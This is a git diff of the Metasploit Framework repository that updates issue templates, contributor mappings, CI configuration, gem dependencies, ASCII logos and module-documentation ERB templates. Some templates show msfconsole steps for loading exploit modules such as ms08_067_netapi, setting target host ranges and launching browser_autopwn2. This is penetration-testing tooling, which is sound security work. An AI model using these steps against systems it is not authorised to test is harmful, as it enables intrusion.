diff --git a/.github/ISSUE_TEMPLATE.md b/.github/ISSUE_TEMPLATE.md new file mode 100644 index 0000000000..dfe8c50c1d --- /dev/null +++ b/.github/ISSUE_TEMPLATE.md @@ -0,0 +1,41 @@ +## Steps to reproduce + +How'd you do it? + +1. ... +2. ... + +This section should also tell us any relevant information about the +environment; for example, if an exploit that used to work is failing, +tell us the victim operating system and service versions. + +## Expected behavior + +What should happen? + +## Current behavior + +What happens instead? + +You might also want to check the last ~1k lines of +`/opt/metasploit/apps/pro/engine/config/logs/framework.log` or +`~/.msf4/logs/framework.log` for relevant stack traces + + +## System stuff + +### Metasploit version + +Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install). + +### I installed Metasploit with: +- [ ] Kali package via apt +- [ ] Omnibus installer (nightly) +- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp) +- [ ] Source install (please specify ruby version) + +### OS + +What OS are you running Metasploit on? + + diff --git a/.github/PULL_REQUEST_TEMPLATE.md b/.github/PULL_REQUEST_TEMPLATE.md new file mode 100644 index 0000000000..cb977a9da4 --- /dev/null +++ b/.github/PULL_REQUEST_TEMPLATE.md @@ -0,0 +1,14 @@ + +Tell us what this change does. If you're fixing a bug, please mention +the github issue number. + +## Verification + +List the steps needed to make sure this thing works + +- [ ] Start `msfconsole` +- [ ] `use exploit/windows/smb/ms08_067_netapi` +- [ ] ... +- [ ] **Verify** the thing does what it should +- [ ] **Verify** the thing does not do what it should not + diff --git a/.gitignore b/.gitignore index 532dcce24a..e83ddb0b91 100644 --- a/.gitignore +++ b/.gitignore @@ -68,6 +68,8 @@ external/source/exploits/**/Release # Avoid checking in Meterpreter binaries. These are supplied upstream by # the metasploit-payloads gem. data/meterpreter/*.dll +data/meterpreter/*.php +data/meterpreter/*.py data/meterpreter/*.bin data/meterpreter/*.jar data/meterpreter/*.lso diff --git a/.mailmap b/.mailmap index 05e09baf26..7ab2a7147d 100644 --- a/.mailmap +++ b/.mailmap @@ -1,45 +1,45 @@ -bcook-r7 -bcook-r7 Brent Cook -bturner-r7 Brandon Turner -cdoughty-r7 Chris Doughty -dheiland-r7 Deral Heiland -dmaloney-r7 David Maloney -dmaloney-r7 David Maloney -dmaloney-r7 dmaloney-r7 -dmohanty-r7 Dev Mohanty -dmohanty-r7 Dev Mohanty -dmohanty-r7 dmohanty-r7 -dmohanty-r7 dmohanty-r7 -ecarey-r7 Erran Carey -farias-r7 Fernando Arias -gmikeska-r7 Greg Mikeska -gmikeska-r7 Gregory Mikeska -hdm HD Moore -hdm HD Moore -hdm HD Moore -jhart-r7 Jon Hart -jlee-r7 # aka egypt -jlee-r7 -kgray-r7 Kyle Gray -lsanchez-r7 Lance Sanchez -lsanchez-r7 Lance Sanchez -lsanchez-r7 Lance Sanchez -lsanchez-r7 Lance Sanchez -lsanchez-r7 darkbushido -lsato-r7 Louis Sato +acammack-r7 Adam Cammack +bcook-r7 +bcook-r7 Brent Cook +bturner-r7 Brandon Turner +bpatterson-r7 Brian Patterson +cdoughty-r7 Chris Doughty +dheiland-r7 Deral Heiland +dmaloney-r7 David Maloney +dmaloney-r7 David Maloney +dmaloney-r7 dmaloney-r7 +dmohanty-r7 Dev Mohanty +dmohanty-r7 Dev Mohanty +dmohanty-r7 dmohanty-r7 +dmohanty-r7 dmohanty-r7 +ecarey-r7 Erran Carey +farias-r7 Fernando Arias +gmikeska-r7 Greg Mikeska +gmikeska-r7 Gregory Mikeska +jhart-r7 Jon Hart +jlee-r7 # aka egypt +jlee-r7 +kgray-r7 Kyle Gray +lsanchez-r7 Lance Sanchez +lsanchez-r7 Lance Sanchez +lsanchez-r7 Lance Sanchez +lsanchez-r7 Lance Sanchez +lsanchez-r7 darkbushido +lsato-r7 Louis Sato pdeardorff-r7 Paul Deardorff pdeardorff-r7 pdeardorff-r7 -sgonzalez-r7 Sonny Gonzalez -shuckins-r7 Samuel Huckins -todb-r7 Tod Beardsley -todb-r7 Tod Beardsley -todb-r7 Tod Beardsley -wchen-r7 # aka sinn3r -wchen-r7 -wvu-r7 William Vu -wvu-r7 William Vu -wvu-r7 William Vu -wvu-r7 wvu-r7 +sgonzalez-r7 Sonny Gonzalez +shuckins-r7 Samuel Huckins +todb-r7 Tod Beardsley +todb-r7 Tod Beardsley +todb-r7 Tod Beardsley +wchen-r7 # aka sinn3r +wchen-r7 +wvu-r7 William Vu +wvu-r7 William Vu +wvu-r7 William Vu +wvu-r7 wvu-r7 +wwebb-r7 William Webb # Above this line are current Rapid7 employees. Below this paragraph are # volunteers, former employees, and potential Rapid7 employees who, at @@ -83,6 +83,9 @@ g0tmi1k g0tmi1k h0ng10 h0ng10 h0ng10 Hans-Martin Münch +hdm HD Moore +hdm HD Moore +hdm HD Moore jabra Josh Abraham jabra Joshua Abraham jcran @@ -111,6 +114,7 @@ m-1-k-3 Michael Messner Meatballs1 Meatballs1 mubix Rob Fuller +net-ninja Steven Seeley nevdull77 Patrik Karlsson nmonkee nmonkee nullbind nullbind diff --git a/.ruby-version b/.ruby-version index 04b10b4f15..63a1a1ca3c 100644 --- a/.ruby-version +++ b/.ruby-version @@ -1 +1 @@ -2.1.7 +2.1.9 diff --git a/.travis.yml b/.travis.yml index 3e24267d3d..4d4c2e3576 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,11 +1,22 @@ +sudo: false +group: stable bundler_args: --without coverage development pcap cache: bundler +addons: + postgresql: '9.3' + apt: + packages: + - libpcap-dev + - graphviz +language: ruby +rvm: + - '2.1.8' + env: - RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true - RAKE_TASKS=spec SPEC_OPTS="--tag content" - RAKE_TASKS=spec SPEC_OPTS="--tag ~content" -language: ruby matrix: fast_finish: true before_install: @@ -23,9 +34,6 @@ before_script: script: # fail build if db/schema.rb update is not committed - git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS -sudo: false -rvm: - - '2.1.7' notifications: irc: "irc.freenode.org#msfnotify" @@ -38,9 +46,3 @@ branches: except: - gh-pages - metakitty - -addons: - postgresql: '9.3' - apt: - packages: - - libpcap-dev diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 7fefad6647..c9ccb13e26 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -37,6 +37,7 @@ and Metasploit's [Common Coding Mistakes]. * **Do** follow the [50/72 rule] for Git commit messages. * **Don't** use the default merge messages when merging from other branches. * **Do** create a [topic branch] to work on instead of working directly on `master`. +* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT. ### Pull Requests diff --git a/Gemfile b/Gemfile index 9893680a4d..0a81128d1c 100755 --- a/Gemfile +++ b/Gemfile @@ -18,6 +18,9 @@ group :development do gem 'yard' # for development and testing purposes gem 'pry' + # module documentation + gem 'octokit', '~> 4.0' + # rails-upgrade staging gems end group :development, :test do diff --git a/Gemfile.lock b/Gemfile.lock index 1bcfd96d81..ca8cb66d75 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,30 +1,33 @@ PATH remote: . specs: - metasploit-framework (4.11.9) + metasploit-framework (4.11.21) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) bcrypt filesize - jsobfu (~> 0.3.0) + jsobfu (~> 0.4.1) json metasm (~> 1.0.2) - metasploit-concern (= 1.0.0) - metasploit-credential (= 1.0.1) - metasploit-model (= 1.0.0) - metasploit-payloads (= 1.0.22) - metasploit_data_models (= 1.2.10) + metasploit-concern + metasploit-credential (= 1.1.0) + metasploit-model (= 1.1.0) + metasploit-payloads (= 1.1.6) + metasploit_data_models (= 1.3.0) msgpack network_interface (~> 0.0.1) nokogiri + octokit openssl-ccm (= 1.2.1) packetfu (= 1.1.11) + patch_finder (>= 1.0.2) pcaprub pg (>= 0.11) railties rb-readline-r7 recog (= 2.0.14) + redcarpet robots rubyzip (~> 1.1) sqlite3 @@ -57,14 +60,15 @@ GEM multi_json (~> 1.3) thread_safe (~> 0.1) tzinfo (~> 0.3.37) + addressable (2.3.8) arel (4.0.2) - arel-helpers (2.1.1) - activerecord (= 4.0.13) + arel-helpers (2.2.0) + activerecord (>= 3.1.0, < 5) aruba (0.6.2) childprocess (>= 0.3.6) cucumber (>= 1.1.1) rspec-expectations (>= 2.7.0) - bcrypt (3.1.10) + bcrypt (3.1.11) builder (3.1.4) capybara (2.4.4) mime-types (>= 1.16) @@ -95,6 +99,8 @@ GEM factory_girl_rails (4.5.0) factory_girl (~> 4.5.0) railties (>= 3.0.0) + faraday (0.9.2) + multipart-post (>= 1.2, < 3) ffi (1.9.8) filesize (0.1.1) fivemat (1.3.2) @@ -102,35 +108,35 @@ GEM multi_json (~> 1.3) hike (1.2.3) i18n (0.7.0) - jsobfu (0.3.0) + jsobfu (0.4.1) rkelly-remix (= 0.0.6) json (1.8.3) mail (2.6.3) mime-types (>= 1.16, < 3) metasm (1.0.2) - metasploit-concern (1.0.0) + metasploit-concern (1.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-credential (1.0.1) - metasploit-concern (~> 1.0) - metasploit-model (~> 1.0) - metasploit_data_models (~> 1.0) + metasploit-credential (1.1.0) + metasploit-concern (~> 1.1) + metasploit-model (~> 1.1) + metasploit_data_models (~> 1.3) pg railties rubyntlm rubyzip (~> 1.1) - metasploit-model (1.0.0) + metasploit-model (1.1.0) activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-payloads (1.0.22) - metasploit_data_models (1.2.10) + metasploit-payloads (1.1.6) + metasploit_data_models (1.3.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) arel-helpers - metasploit-concern (~> 1.0) - metasploit-model (~> 1.0) + metasploit-concern (~> 1.1) + metasploit-model (~> 1.1) pg postgres_ext railties (>= 4.0.9, < 4.1.0) @@ -139,20 +145,24 @@ GEM mime-types (2.6.1) mini_portile2 (2.0.0) minitest (4.7.5) - msgpack (0.7.1) + msgpack (0.7.4) multi_json (1.11.2) multi_test (0.1.2) + multipart-post (2.0.0) network_interface (0.0.1) nokogiri (1.6.7.2) mini_portile2 (~> 2.0.0.rc2) + octokit (4.2.0) + sawyer (~> 0.6.0, >= 0.5.3) openssl-ccm (1.2.1) packetfu (1.1.11) network_interface (~> 0.0) pcaprub (~> 0.12) - pcaprub (0.12.0) + patch_finder (1.0.2) + pcaprub (0.12.1) pg (0.18.4) pg_array_parser (0.0.9) - postgres_ext (2.4.1) + postgres_ext (3.0.0) activerecord (>= 4.0.0) arel (>= 4.0.1) pg_array_parser (~> 0.0.9) @@ -200,8 +210,11 @@ GEM rspec-mocks (~> 3.3.0) rspec-support (~> 3.3.0) rspec-support (3.3.0) - rubyntlm (0.5.2) - rubyzip (1.1.7) + rubyntlm (0.6.0) + rubyzip (1.2.0) + sawyer (0.6.0) + addressable (~> 2.3.5) + faraday (~> 0.8, < 0.10) shoulda-matchers (2.8.0) activesupport (>= 3.0.0) simplecov (0.9.2) @@ -238,6 +251,7 @@ DEPENDENCIES factory_girl_rails (~> 4.5.0) fivemat (~> 1.3.1) metasploit-framework! + octokit (~> 4.0) pry rake (>= 10.0.0) redcarpet diff --git a/config/cucumber.yml b/config/cucumber.yml index e3de143513..8cfb5f1a74 100644 --- a/config/cucumber.yml +++ b/config/cucumber.yml @@ -6,5 +6,6 @@ ignored_tags = "--tags ~@boot --tags ~@targets" %> default: <%= std_opts %> <%= ignored_tags %> features boot: <%= std_opts %> --tags @boot features +exploit: <%= std_opts %> --tags @targets features wip: --tags @wip:3 --wip features -rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip +rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip \ No newline at end of file diff --git a/config/database.yml.example b/config/database.yml.example index 060dd23625..b04aede6b0 100644 --- a/config/database.yml.example +++ b/config/database.yml.example @@ -1,9 +1,9 @@ -# Please only use postgresql bound to a TCP port. -# Only postgresql is supportable for metasploit-framework -# these days. (No SQLite, no MySQL). -# # To set up a metasploit database, follow the directions hosted at: # http://r-7.co/MSF-DEV#set-up-postgresql +# +# Kali Linux and the Omnibus installers both include an easy wrapper script for +# managing your database, which may be more convenient than rolling your own. + development: &pgsql adapter: postgresql database: metasploit_framework_development @@ -11,7 +11,7 @@ development: &pgsql password: __________________________________ host: localhost port: 5432 - pool: 5 + pool: 200 timeout: 5 # You will often want to seperate your databases between dev diff --git a/data/exploits/R7_2015_17/stream.raw b/data/exploits/R7_2015_17/stream.raw new file mode 100644 index 0000000000..aa17f76ea2 Binary files /dev/null and b/data/exploits/R7_2015_17/stream.raw differ diff --git a/data/logos/zsploit-1.txt b/data/logos/zsploit-1.txt index 98cd8006bf..95d6f8cd24 100644 --- a/data/logos/zsploit-1.txt +++ b/data/logos/zsploit-1.txt @@ -1,11 +1,11 @@ -____________ - [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] - [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] - [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|`?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%] - [% .--------..-----.| |_ .---.-.|.,a$%|.-----.| |.-----.|__|| |_ %%] - [% ||| -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%] - [% |__|__|__||_____||____||___._||%$P"`|| __||__||_____||__||____|%%] - [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,||__|%%%%%%%%%%%%%%%%%%%%%%%%%%] - [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] - [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%`"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] - [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] +%bld%blk ____________%whi + [%%%%%clr%%%%%%%%%bld%blk%%%%%%%%blk%%%%%%%%%%%%%| %red$a,%blk |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%whi] + [%%%%clr%%%%%%%%%%bld%blk%%%%%%%%%%%%%%%%%%%%| %red$S`?a,%blk |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%whi] + [%%%clr%%%%%%%%bld%blk%%%%%%%%%%%%whi_%cya_%blk%%%%%%%%%%| %red`?a,%blk |%%%%%%%%%whi_%grn_%blk%%%%%%%%%%whi_%grn_%blk%%%whi_%grn_ %blk%%%%%whi] + [% .-%cya--%clr%cya-----.%bld%whi.-%cya-%clr%cya---.%bld%whi| %clr%cya|_ %bld%whi.-%cya-%clr%cya-.-.%bld%blk| %red.,a$%%blk|%whi.-%grn---%clr%grn-.%bld%whi| %clr%grn|%bld%whi.-%grn--%clr%grn--.%bld%whi|%grn_%clr%grn_|%bld%whi| %clr%grn|_ %bld%blk%%%whi] + [% | %clr%cya|%bld%whi| %clr%cya-__|%clr%cya| %clr%cya_|%bld%whi| %clr%cya_ |%bld%blk| %red,,aS$""`%blk |%whi| %clr%grn_ |%bld%grn| %clr%grn|%bld%whi| %clr%grn_ |%bld%grn| %clr%grn|%bld%grn| %clr%grn_|%bld%blk%%%whi] + [% %cya|%clr%cya__|__|__|%bld%cya|_%clr%cya____|%bld%cya|_%clr%cya___|%bld%cya|_%clr%cya__._|%bld%blk|%red%$P"`%blk |%grn| %clr%grn__|%bld%grn|_%clr%grn_|%bld%grn|_%clr%grn____|%bld%grn|_%clr%grn_|%bld%grn|_%clr%grn___|%bld%blk%%%bld%whi] + [%%clr%%%%bld%blk%%%%%%%%%%%%%%%%%%%%%%%%%%%%| %red`"a,%blk |%clr%grn|__|%bld%blk%%%%%%%%%%%%%%%%%%%%%%%%%%%whi] + [%%clr%%%bld%blk%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____%red`"a,$$%blk__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%whi] + [%clr%%%bld%blk%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %red`"$%blk %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%whi] + [%clr%%bld%blk%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%whi] diff --git a/data/logos/zsploit-2.txt b/data/logos/zsploit-2.txt index c95f49cbe9..48c6631edd 100644 --- a/data/logos/zsploit-2.txt +++ b/data/logos/zsploit-2.txt @@ -1,21 +1,20 @@ - - -.. - . - -dBBBBBBb dBBBP dBBBBBBP dBBBBBb .o -' dB'BBP - dB'dB'dB' dBBPdBPdBP BB - dB'dB'dB' dBPdBPdBP BB - dB'dB'dB' dBBBBP dBPdBBBBBBB - -dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP -..dB' dBP dB'.BP -|dBP dBBBB' dBP dB'.BP dBP dBP ---o-- dBP dBP dBP dB'.BP dBP dBP -|dBBBBP dBP dBBBBP dBBBBP dBP dBP - -. -. -oTo boldly shell were no -shell has gone before +%bld%whi + . . + . + + %bludBBBBBBb dBBBP dBBBBBBP dBBBBBb %whi. o + %blu ' dB' BBP + dB'dB'dB' dBBP dBP dBP BB + dB'dB'dB' dBP dBP dBP BB + dB'dB'dB' dBBBBP dBP dBBBBBBB + + %reddBBBBBP %bludBBBBBb dBP dBBBBP dBP dBBBBBBP + %whi. %cya. %bludB' dBP dB'.BP + %cya| %reddBP%blu dBBBB' dBP dB'.BP dBP dBP + %cya--o-- %reddBP%blu dBP dBP dB'.BP dBP dBP + %cya| %reddBBBBP%blu dBP dBBBBP dBBBBP dBP dBP%whi + + . + . + o %grnTo boldly go where no + shell has gone before diff --git a/data/logos/zsploit-3.txt b/data/logos/zsploit-3.txt index 35fd821a29..3a2c01931a 100644 --- a/data/logos/zsploit-3.txt +++ b/data/logos/zsploit-3.txt @@ -1,22 +1,21 @@ - -.,,.. -.\$$$$$L..,,==aaccaacc%#s$b.d8, d8P -d8P#$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p -d888888P'7$$$$\""""''^^`` .7$$$|D*"'```?88' - d8bd8b.d8p d8888b ?88' d888b8b_.os#$|8*"` d8P?8b 88P - 88P`?P'?P d8b_,dP 88P d8P' ?88.oaS###S*"`d8P d8888b ?88b 88b - d88 d8 ?8 88b88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b -d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88 -.a#$$$$$$"`88b d8P 88b`?8888P' -,s$$$$$$$"`888888P' 88n_.,,,ass;: -.a$$$$$$$P`d88P' .,.ass%#S$$$$$$$$$$$$$$' -.a$###$$$P`_.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' -,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' -.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$' -_______________________________________________________________ ,&$$$$$$'_____, - ll&&$$$$' -.;;lll&&&&' -...;;lllll&' -......;;;llll;;;.... -` ......;;;;... . . -` `` ` +%clr%bld%red + .,,. . + .\$$$$$L..,,==aaccaacc%#s$b. %whid%grn8, %whid8%grnP + %whid8%cyaP %red#$$$$$$$$$$$$$$$$$$$$$$$$$$$b. %whi`BP d88%grn8888p + %whid%cya888888P %red'7$$$$\""""''^^`` .7$$$|D*"'``` %whi?%grn88' + %whid8%cyabd8b.d8p %whid8%cya888b %whi?%cya88' %whid88%cya8b8b%red _.os#$|8*"` %whid8%grnP %whi?8%grnb 88P + %whi8%cya8P`?P'?P %whid8%cyab_,dP 88P %whid8%cyaP' ?88%red .oaS###S*"` %whid8%grnP %whid88%grn88b $whi?%grn88b 88b + %cyad88 d8 ?8 88b %whi8%cya8b 88b ,88b %red.osS$$$$*" %grn?88,.d88b, %whid%grn88 %whid%grn8P' ?88 88P `?8b +%cyad88' d88b 8b`?8888P'`?8b`?88P'%red.aS$$$$Q*"` %grn`?88' ?88 ?88 88b d88 d88%red + .a#$$$$$$"` %grn88b d8P 88b`?8888P'%red + ,s$$$$$$$"` %grn888888P' 88n%red _.,,,ass;: + .a$$$$$$$P` %grnd88P'%red .,.ass%#S$$$$$$$$$$$$$$' + .a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' + ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' + .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$' +%whi___________%clr_____________________________%bld%blk_______________________%red ,&$$$$$$'%blk_____%red + ll&&$$$$' + .;;lll&&&&' + ...;;lllll&' + ......;;;llll;;;.... + ` ......;;;;... . . diff --git a/data/markdown_doc/auxiliary_scanner_template.erb b/data/markdown_doc/auxiliary_scanner_template.erb new file mode 100644 index 0000000000..409a7c9970 --- /dev/null +++ b/data/markdown_doc/auxiliary_scanner_template.erb @@ -0,0 +1,29 @@ +This module is a scanner module, and is capable of testing against multiple hosts. + +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > show options + ... show and set options ... +msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS ip-range +msf <%= mod.type %>(<%= mod.shortname %>) > exploit +``` + +Other examples of setting the RHSOTS option: + +Example 1: + +``` +msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS 192.168.1.3-192.168.1.200 +``` + +Example 2: + +``` +msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS 192.168.1.1/24 +``` + +Example 3: + +``` +msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS file:///tmp/ip_list.txt +``` diff --git a/data/markdown_doc/bes_demo_template.erb b/data/markdown_doc/bes_demo_template.erb new file mode 100644 index 0000000000..21c130dae2 --- /dev/null +++ b/data/markdown_doc/bes_demo_template.erb @@ -0,0 +1,15 @@ +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > run +``` + +This module is also supported by Browser Autopwn 2. + +To load it from Browser Autopwn 2, here's how: + +``` +msf > use auxiliary/server/browser_autopwn2 +msf auxiliary(browser_autopwn2) > set INCLUDE_PATTERN <%= mod.shortname %> +INCLUDE_PATTERN => <%= mod.shortname %> +msf auxiliary(browser_autopwn2) > exploit +``` \ No newline at end of file diff --git a/data/markdown_doc/default_template.erb b/data/markdown_doc/default_template.erb new file mode 100644 index 0000000000..a771f07991 --- /dev/null +++ b/data/markdown_doc/default_template.erb @@ -0,0 +1,50 @@ +## <%= items[:mod_name] %> +

+<%= normalize_description(items[:mod_description]) %> +

+ +## Module Name + +<%= Rex::Text.html_encode(items[:mod_fullname]) %> + +## Authors + +<%= normalize_authors(items[:mod_authors]) %> + +<% unless items[:mod_platforms].empty? %> +## Platforms +<%= normalize_platforms(items[:mod_platforms]) %> +<% end %> + +## Reliability + +<%= normalize_rank(items[:mod_rank]) %> + +## Related Pull Requests + +<%= normalize_pull_requests(items[:mod_pull_requests]) %> + +<% unless items[:mod_refs].empty? %> +## References + +<%= normalize_references(items[:mod_refs]) %> +<% end %> + +<% if items[:mod_targets] %> +## Available Targets + +<%= normalize_targets(items[:mod_targets]) %> + +<% end %> + +## Required Options + +<% if normalize_options(items[:mod_options]).empty? %> +No options required. +<% else %> +<%= normalize_options(items[:mod_options]) %> +<% end %> + +## Basic Usage + +<%= normalize_demo_output(items[:mod_demo]) %> \ No newline at end of file diff --git a/data/markdown_doc/generic_demo_template.erb b/data/markdown_doc/generic_demo_template.erb new file mode 100644 index 0000000000..fec7ccf244 --- /dev/null +++ b/data/markdown_doc/generic_demo_template.erb @@ -0,0 +1,9 @@ +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > show targets + ... a list of targets ... +msf <%= mod.type %>(<%= mod.shortname %>) > set TARGET target-id +msf <%= mod.type %>(<%= mod.shortname %>) > show options + ... show and set options ... +msf <%= mod.type %>(<%= mod.shortname %>) > exploit +``` \ No newline at end of file diff --git a/data/markdown_doc/html_template.erb b/data/markdown_doc/html_template.erb new file mode 100644 index 0000000000..ff5dbdcb08 --- /dev/null +++ b/data/markdown_doc/html_template.erb @@ -0,0 +1,54 @@ + + +<% unless kb.empty? %> + +<% end %> + + + +<% unless kb.empty? %> + + + + +
+
Overview +
 +
Knowledge Base +
+

+<% end %> +
+<%= r.render(md) %> +
+<% unless kb.empty? %> +
+<%= r.render(kb) %> +
+<% end %> + + \ No newline at end of file diff --git a/data/markdown_doc/httpserver_demo_template.erb b/data/markdown_doc/httpserver_demo_template.erb new file mode 100644 index 0000000000..3d5737a95d --- /dev/null +++ b/data/markdown_doc/httpserver_demo_template.erb @@ -0,0 +1,4 @@ +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > exploit +``` \ No newline at end of file diff --git a/data/markdown_doc/localexploit_demo_template.erb b/data/markdown_doc/localexploit_demo_template.erb new file mode 100644 index 0000000000..e7ac42287c --- /dev/null +++ b/data/markdown_doc/localexploit_demo_template.erb @@ -0,0 +1,14 @@ +Note: To run a local exploit, make sure you are at the msf prompt. +Also, to check the session ID, use the ```sessions``` command. + + +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > show targets + ... a list of targets ... +msf <%= mod.type %>(<%= mod.shortname %>) > set TARGET target-id +msf <%= mod.type %>(<%= mod.shortname %>) > show options + ... show and set options ... +msf <%= mod.type %>(<%= mod.shortname %>) > set SESSION session-id +msf <%= mod.type %>(<%= mod.shortname %>) > exploit +``` \ No newline at end of file diff --git a/data/markdown_doc/markdown.css b/data/markdown_doc/markdown.css new file mode 100644 index 0000000000..abe2aec153 --- /dev/null +++ b/data/markdown_doc/markdown.css @@ -0,0 +1,258 @@ +h1, h2, h3, h4, h5, h6, p, blockquote { + margin: 0; + padding: 0; +} +body { + font-family: Arial, "Helvetica Neue", Helvetica, "Hiragino Sans GB", sans-serif; + font-size: 16px; + line-height: 18px; + color: #737373; + margin: 10px 13px 10px 13px; +} +a { + color: #0069d6; +} +a:hover { + color: #0050a3; + text-decoration: none; +} +a img { + border: none; +} +p { + margin-bottom: 16px; +} +h1, h2, h3, h4, h5, h6 { + color: #404040; + line-height: 36px; +} +h1 { + margin-bottom: 18px; + font-size: 30px; +} +h2 { + font-size: 24px; + margin-bottom: 16px; +} +h3 { + font-size: 18px; + margin-bottom: 16px; +} +h4 { + font-size: 16px; + margin-bottom: 16px; +} +h5 { + font-size: 16px; + margin-bottom: 16px; +} +h6 { + font-size: 13px; + margin-bottom: 16px; +} +hr { + margin: 0 0 19px; + border: 0; + border-bottom: 1px solid #eee; +} +blockquote { + padding: 13px 13px 21px 15px; + margin-bottom: 18px; + font-family:georgia,serif; + font-style: italic; +} +blockquote:before { + content:"\201C"; + font-size:40px; + margin-left:-10px; + font-family:georgia,serif; + color:#eee; +} +blockquote p { + font-size: 16px; + font-weight: 300; + line-height: 18px; + margin-bottom: 0; + font-style: italic; +} +code, pre { + font-family: Monaco, Andale Mono, Courier New, monospace; +} +code { + background-color: #eee; + color: rgba(0, 0, 0, 0.75); + padding: 1px 3px; + font-size: 13px; + -webkit-border-radius: 3px; + -moz-border-radius: 3px; + border-radius: 3px; +} +pre { + display: block; + padding: 16px; + margin: 0 0 18px; + line-height: 16px; + font-size: 13px; + border: 1px solid #d9d9d9; + white-space: pre-wrap; + word-wrap: break-word; +} +pre code { + background-color: #fff; + color:#737373; + font-size: 13px; + padding: 0; +} +@media screen and (min-width: 768px) { + body { + width: 748px; + margin:10px auto; + } +} +#overview_info_button { + font-family:Arial, sans-serif; + font-size:16px; + padding:10px 5px; + border-style:solid; + border-width:1px; + border-color:#ccc; + color:#333; +} +#knowledge_base_button { + font-family:Arial, sans-serif; + font-size:16px; + padding:10px 5px; + border-style:solid; + border-width:1px; + border-color:#EEEEEE; + color:#C4C4C4; +} +#overview_info_button:hover, #knowledge_base_button:hover { + cursor: pointer; +} +#knowledge_base { + display: none; +} +#long_list { + height:280px; + overflow:auto; + border-style: solid; + border-width: 1px; + border-color: #ccc; + padding: 5px; +} + + +/* +Description: Foundation 4 docs style for highlight.js +Author: Dan Allen +Website: http://foundation.zurb.com/docs/ +Version: 1.0 +Date: 2013-04-02 +*/ + +pre code { + display: block; padding: 0.5em; + background: #eee; +} + +pre .decorator, +pre .annotation { + color: #000077; +} + +pre .attribute { + color: #070; +} + +pre .value, +pre .string, +pre .scss .value .string { + color: #d14; +} + +pre .comment { + color: #998; + font-style: italic; +} + +pre .function .title { + color: #900; +} + +pre .class { + color: #458; +} + +pre .id, +pre .pseudo, +pre .constant, +pre .hexcolor { + color: teal; +} + +pre .variable { + color: #336699; +} + +pre .javadoc { + color: #997700; +} + +pre .pi, +pre .doctype { + color: #3344bb; +} + +pre .number { + color: #099; +} + +pre .important { + color: #f00; +} + +pre .label { + color: #970; +} + +pre .preprocessor { + color: #579; +} + +pre .reserved, +pre .keyword, +pre .scss .value { + color: #000; +} + +pre .regexp { + background-color: #fff0ff; + color: #880088; +} + +pre .symbol { + color: #990073; +} + +pre .symbol .string { + color: #a60; +} + +pre .tag { + color: #007700; +} + 